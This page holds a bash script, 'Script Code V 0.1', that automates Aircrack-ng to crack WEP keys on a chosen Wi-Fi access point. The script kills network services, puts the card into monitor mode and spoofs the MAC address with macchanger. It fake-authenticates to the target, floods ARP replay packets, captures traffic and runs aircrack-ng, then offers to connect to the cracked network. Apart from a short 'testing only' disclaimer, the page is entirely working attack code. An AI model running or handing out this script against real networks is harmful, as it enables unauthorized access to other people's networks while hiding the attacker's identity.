#labels script,bash,shell

= Script Code V 0.1 =


#!/bin/bash 
##########################################
##########################################
######## This script was created  ########
######## for testing purpose's on ########
######## -ly. Other purpose's are ########
######## Illegal.                 ########
######## You MUST set kismet to u ########
######## -se mon0 as the interfa  ########
######## -ce. This is a front end ########
######## of Aircrack-ng. To find  ########
######## out more about aircrac   ########
######## -k-ng go to :            ########
########      aircrack-ng.org .   ########
########      Created by Dub-T.   ########
##########################################
##########################################
#
#
#Kills the processes that may use your adapter.
sudo killall NetworkManager && sudo killall NetworkManagerDispatcher && killall wpa_supplicant
clear
#Stores your adapter to a variable: interface
read -p "Enter the Interface you would like to use : " interface
echo ""
clear
#Starts the adapter in monitor mode just in case you want to run kismet.
sudo airmon-ng start $interface
clear
#Ask you if you would like to run kismet, and if so stores your answer to a variable: kismetm
read -p "Would you like to run kismet to find a network to crack, and/or a client to fake your MAC Address? y/n : " kismetm
echo ""
#If the variable kismetm equals y, the script will run kismet.
   if [ $kismetm = y ]
                 then clear && sudo xterm -e "kismet" &
                 else clear && echo "Continuing...
                 "
   fi
clear
#Stores your desired transmission rate to a variable: rate
read -p "Enter the Transmission Rate would you like to set your interface 1M, 2M, 5.5M, 6M, 9M, 11M, 12M, 18M, 24M, 36M, 48M, 54M : " rate
echo ""
clear
#Ask you if you would like to change your interfaces mac address, and if so stores your answer to a variable: macset
read -p "Would you like to change your Wi-Fi card's MAC Address? y/n : " macset
echo ""
#If the variable macset equals y, the script will ask if you would like a random mac address, and if so stores your answer to a variable: ramac
   if [ $macset = y ]
                 then clear && read -p "Would you like a random MAC? y/n : " ramac
                 else clear && echo "Continuing...
                  "
   fi
#If the variable ramac equals y, the script will change your wifi cards mac address at random.
   if [ $ramac = y ]
                 then sudo ifconfig mon0 down && sudo macchanger -r $interface && sudo macchanger -r mon0 && ifconfig mon0 up
   fi
clear
#This displays your mac address from your interface so you can confirm it.
sudo macchanger -s mon0
echo "
"
#This will ask for your confirmation on your mac address, and if you wish to change it will store it to a variable: hmac
read -p "Please confirm MAC Address even if you did not change it or if you would like to. If you do not wish to change your MAC Address, just confirm the MAC Address above. : " hmac
echo ""
clear
#This reads the variable ramac and if n with change your interface to the desired mac address.
   if [ $ramac = n ]
                 then sudo ifconfig mon0 down && sudo macchanger -m $hmac $interface && sudo macchanger -m $hmac mon0 && sudo ifconfig mon0 up
   fi
clear
#This sets your wifi cards mac address to the mac address of airmon-ng's mon0.
   if [ $macset = n ]
                 then sudo macchanger -m $hmac $interface && sudo macchanger $hmac mon0
   fi
clear
#This sets your wifi card to the transmission rate you want.
sudo iwconfig $interface rate $rate
clear
#This next lines of commands ask for the necessary information about your access point.  
read -p "Enter the Wi-Fi Access Points MAC Address : " mac
echo ""
clear
read -p "Enter the Wi-Fi Access Points SSID : " ssid
echo ""
clear
read -p "Enter the Wi-Fi Access Points Channel : " channel
clear
#This will verify the info you have just typed, and will ask you if it's correct. This will then store it to a variable: start
echo "Is this correct? : Interface: $interface , Transmission Rate: $rate , Wi-Fi AP's MAC: $mac , SSID: $ssid , Channel: $channel ,  Wi-Fi Card's MAC: $hmac"
read -p "y/n : " start
echo ""
#This will read variable start and if y will continue. If the variable start is no, it will reset your wifi card and start over.
   if [ $start = y ]
                 then echo "Starting..."
                 else sudo airmon-ng stop mon0 && sudo killall xterm && sudo killall kismet && sudo iwconfig $interface rate 54M && bash Aircrack-ng.sh
   fi
clear
#This will close the kismet window.
sudo killall xterm
clear
#The next two lines will stop your wifi card and kill kismet to save cpu power for the cracking process. It will then start your wifi card in monitor mode and with the desired channel.
sudo airmon-ng stop mon0 && sudo killall kismet
sudo airmon-ng start $interface $channel
clear
#This will start airodump-ng on the right channel and target the access point you desire.
sudo xterm -hold -e "airodump-ng -c $channel --bssid $mac -w output mon0"  &
echo "Starting Injections...
"
#The next two lines will set your card on the channel you desire and try to fake authenticate you on the network you wish to crack.
sudo iwconfig $interface channel $channel
sudo aireplay-ng -1 0 -e "$ssid" -a $mac -h $hmac mon0
echo "

"
#This will start requesting arp request at an average of 500 packets per second.
sudo xterm -hold -e "sudo  aireplay-ng -3 -b $mac -h $hmac mon0"  &
#If the above authorization fails, you can choose to start a more direct authorization. It will then store your answer to variable: ivs
read -p "Would you like to keep Re-autherizing yourself? (If you stop receiving IV's) y/n : " ivs
echo ""
#This will read variable ivs and if y will open a new window and start fake authorizing you as client.
   if [ $ivs = y ]
                 then clear && sudo xterm -hold -e "aireplay-ng -1 6000 -o 1 -q 10 -e "$ssid" -a $mac -h $hmac mon0"  &
                 else clear && echo "Continuing...
                 "
   fi
#This will ask you if you would like run aircrack-ng. It then stores your answer to variable: aircrack
read -p "Run Aircrack-ng? y/n : " aircrack
echo ""
#This will read variable aircrack and if y will launch aircrack.
   if [ $aircrack = y ]
                 then clear && sudo xterm -hold -e "aircrack-ng -z output*.cap"  &
                 else clear
   fi
#This will ask you if you would like to stop your cracking and store your answer to variable: connect
read -p "Would you like to connect to the Wi-Fi AP you just cracked? y/n : " connect
echo ""
#This will read variable connect and if y will stop cracking and start networkmanager for connecting to the network you cracked. If no it will stop cracking.
   if [ $connect = y ]
                 then sudo airmon-ng stop mon0 && sudo NetworkManager && sudo iwconfig $interface rate 54M && sudo killall kismet && sudo killall xterm && echo "Starting NetworkManager..."
                 else sudo airmon-ng stop mon0 && sudo killall xterm && sudo killall kismet && sudo iwconfig $interface rate 54M && exit
   fi





